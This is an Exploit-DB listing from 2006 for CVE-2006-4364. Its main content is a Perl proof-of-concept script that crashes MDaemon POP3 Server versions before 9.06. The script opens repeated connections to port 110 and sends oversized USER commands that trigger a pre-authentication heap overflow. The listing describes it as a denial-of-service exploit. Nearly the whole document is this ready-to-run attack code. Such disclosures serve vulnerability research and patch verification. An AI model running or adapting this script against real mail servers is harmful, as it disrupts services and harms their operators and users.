MDaemon POP3 Server < 9.06 - USER Remote Buffer Overflow PoC

2006-08-22T00:00:00
ID EDB-ID:2245
Type exploitdb
Reporter Leon Juranic
Modified 2006-08-22T00:00:00

Description

MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC. CVE-2006-4364. Dos exploit for windows platform

                                        
                                            #
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic &lt;leon.juranic@infigo.hr&gt;
# Infigo IS &lt;http://www.infigo.hr&gt;
# 
#

$host = '192.168.0.105';

use IO::Socket;

for ($x = 0 ; $x &lt; 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr =&gt; $host,PeerPort =&gt; '110', Proto =&gt; 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A" x 160 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "QUIT\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr =&gt; $host,PeerPort =&gt; '110', Proto =&gt; 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\'A" x  337 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);

# milw0rm.com [2006-08-22]